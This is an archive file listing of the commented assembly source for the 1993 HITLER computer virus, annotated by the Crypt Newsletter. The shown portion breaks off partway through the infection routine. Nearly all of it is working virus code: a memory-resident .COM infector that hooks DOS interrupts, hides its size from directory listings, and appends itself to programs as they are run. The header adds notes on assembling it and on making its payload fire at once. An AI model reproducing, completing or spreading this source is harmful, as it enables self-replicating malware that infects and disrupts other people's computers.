home *** CD-ROM | disk | FTP | other *** search
/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / VIRUS / HITLER.A86 < prev    next >
Text File  |  1993-01-05  |  39KB  |  719 lines
  1. ;The HITLER virus: commented in a rough 'n' ready way by the 
  2. ;Crypt Newsletter staff for issue #11, January 1993.                
  3. ;The HITLER virus is a memory resident .COM infector which adds itself
  4. ;to the end of infected files. HITLER employs
  5. ;minimal directory stealth. 
  6. ;The minimal stealth allows the virus to subtract its file size from                
  7. ;infected targets when the user takes a look at them using "dir"
  8. ;functions while the virus is in memory.
  9. ;Most of HITLER's code is devoted to a huge data table which is a voice
  10. ;sample of some nut shouting "HITLER."  The virus ties the effect to
  11. ;the timer tick function, but if you want to hear it immediately, change the
  12. ;source were indicated. The resulting code will assemble under A86. On
  13. ;execution the virus will lock the PC into the voice effect until reboot,
  14. ;rendering it uninfective, if annoying.  Not all PC's can generate the
  15. ;HITLER sound effect - some will just buzz.
  16.  
  17.  
  18.                 call    rakett      ; recalculate offset
  19. old             db '═ É!¡'          ; virus identification marker
  20. rakett:         pop     bp
  21.                 push    bp
  22.                 add     bp,-103h
  23.  
  24.                 mov     ax,42ABh    ; check if virus installed
  25.                 int     21h
  26.                 jnc     failed      ; exit if here
  27.  
  28.                 cli
  29.                 mov     ax,3521h
  30.                 int     21h                         ; get interrupt vector
  31.                 mov     w [bp+offset old21],bx      ; es:bx points to
  32.                 mov     w [bp+offset old21+2],es    ; interrupt handler
  33.  
  34.                 mov     al,1Ch                      
  35.                 int     21h                         
  36.                 cli
  37.                 mov     w [bp+offset old1C],bx      ; access timer tick int.
  38.                 mov     w [bp+offset old1C+2],es
  39.                 mov     w [bp+offset teller],16380  ; stuff our value into
  40.                 sti                                 ; "teller" buffer for
  41.                                                     ; later
  42.                 call    normalspeed                 ; eh?
  43.  
  44.                 mov     si,ds
  45.                 std
  46.                 lodsb
  47.                 cld
  48.                 mov     ds,si
  49.  
  50.                 xor     bx,bx
  51.                 mov     cx,pgf
  52.                 cmp     b [bx],'Z'
  53.                 jne     failed
  54.                 mov     ax,[bx+3]
  55.                 sub     ax,cx
  56.                 jc      failed
  57.                 mov     [bx+3],ax
  58.                 sub     [bx+12h],cx
  59.                 mov     es,[bx+12h]
  60.  
  61.                 push    cs
  62.                 pop     ds
  63.  
  64.                 mov     di,100h
  65.                 mov     si,bp
  66.                 add     si,di
  67.                 mov     cx,size
  68.                 rep     movsb
  69.  
  70.                 push    es
  71.                 pop     ds
  72.                 mov     ax,2521h
  73.                 mov     dx,offset ni21     ; set int 21 route through virus
  74.                 int     21h
  75.                 mov     al,1Ch
  76.                 mov     dx,offset ni1C     ; revector timer tick through
  77.                 int     21h                ; virus
  78.  
  79. failed:         push    cs
  80.                 push    cs
  81.                 pop     ds
  82.                 pop     es
  83.  
  84.                 pop     si
  85.                 mov     di,100h
  86.                 push    di
  87.                 movsw
  88.                 movsw
  89.                 movsb
  90.  
  91.                 mov     cx,0FFh
  92.                 mov     si,100h
  93.                 ret                    ; exit to host
  94.  
  95.  
  96. findFCB:        popf
  97.                 call    int21          ; look to virus "stealth" 
  98.                 pushf                  ; routine, now that int 21
  99.                 or      al,al          ; comes through virus
  100.                 jnz     backFCB
  101.                 call    stealth
  102. backFCB:        popf
  103.                 iret
  104.  
  105. stealth:        push    ax          ; the following essentially massages the
  106.                 push    bx          ; file control block on directory scans,
  107.                 push    dx         ; subtracting the virus size from infected
  108.                 push    es          ; files before the user sees 'em
  109.  
  110.                 mov     ah,2Fh       ; get disk transfer address
  111.                 call    int21        ; 
  112.  
  113.                 cmp     byte es:[bx],0FFh ; failed? 
  114.                 jne     normFCB           ; no, everything still OK
  115.                 add     bx,8
  116. normFCB:        mov     al,byte es:[bx+16h]  ; retrieve seconds attribute 
  117.                 and     al,31                ; from observed file, if it's
  118.                 xor     al,31                ; 31, the file is infected
  119.                 jnz     shitFCB              ; not 31 - file not infected
  120.                 mov     ax,word es:[bx+1Ch]
  121.                 mov     dx,word es:[bx+1Ch+2]
  122.                 sub     ax,size              ; subtract virus length from
  123.                 sbb     dx,0                 ; infected file
  124.                 jc      shitFCB              ; no files? exit
  125.                 mov     word es:[bx+1Ch],ax
  126.                 mov     word es:[bx+1Ch+2],dx
  127. shitFCB:                                     ; restore everything as normal
  128.                 pop     es
  129.                 pop     dx
  130.                 pop     bx
  131.                 pop     ax
  132.                 ret
  133.  
  134. ni21:           pushf
  135.                 cmp     ah,11h    ; any user access of the file control
  136.                 je      findFCB   ; block must come through virus
  137.                 cmp     ah,12h    ; ditto for here
  138.                 je      findFCB
  139.  
  140.                 cmp     ax,42ABh  ; 
  141.                 jne     not_42AB
  142.                 popf
  143.                 clc
  144.                 retf    2
  145. not_42AB:
  146.                 cmp     ax,4B00h    ; is a program being loaded?
  147.                 jne     not_4B00    ; exit if not
  148.  
  149.                 call    install_24  ; install critical error handler
  150.  
  151.                 push    ax
  152.                 push    bx
  153.                 push    cx
  154.                 push    dx
  155.                 push    ds
  156.                 push    bp
  157.  
  158.                 mov     ax,4300h     ; get file attributes of potential host
  159.                 call    int21
  160.                 jc      back1        ; failed? exit
  161.                 mov     cs:old_attr,cx   ; stash attributes here
  162.  
  163.                 test    cl,4         ; is the potential host a system file?
  164.                 jnz     back1        ; yes? so exit
  165.  
  166.                 mov     ax,4301h     ; set new file attributes, read or write
  167.                 xor     cx,cx
  168.                 call    int21
  169.                 jc      back1        ; error? exit
  170.  
  171.                 push    dx
  172.                 push    ds
  173.                 call    infect       ; begin infection stuff
  174.                 pop     ds
  175.                 pop     dx
  176.  
  177.                 mov     ax,4301h
  178. db              0B9h    ;mov CX,...
  179. old_attr        dw 0
  180.                 call    int21
  181.  
  182. back1:                             ;go here if the attrib-get fails
  183.                 pop     bp
  184.                 pop     ds
  185.                 pop     dx
  186.                 pop     cx
  187.                 pop     bx
  188.                 pop     ax
  189.  
  190. call    remove_24                 ; normalize critical error handler
  191.  
  192. not_4B00:
  193. back:           popf
  194.                 db 0EAh
  195. old21           dw 0,0
  196.  
  197. int21:          pushf
  198.                 call    dword ptr cs:old21
  199.                 ret
  200.  
  201. infect:         mov     ax,3D02h    ; open host file with read/write access
  202.                 call    int21
  203.                 jnc     okay_open
  204. bad1:           ret                 ; was there an error? exit
  205. okay_open:      xchg    bx,ax
  206.                 mov     ax,5700h    ; get file date and file time
  207.                 call    int21
  208.                 push    cx
  209.                 mov     bp,sp
  210.                 push    dx
  211.  
  212.                 mov     ah,3Fh   ; read first five bytes from potential host
  213.                 mov     cx,5
  214.                 mov     dx,offset old ; store them here
  215.                 push    cs
  216.                 pop     ds
  217.                 call    int21
  218.                 jc      close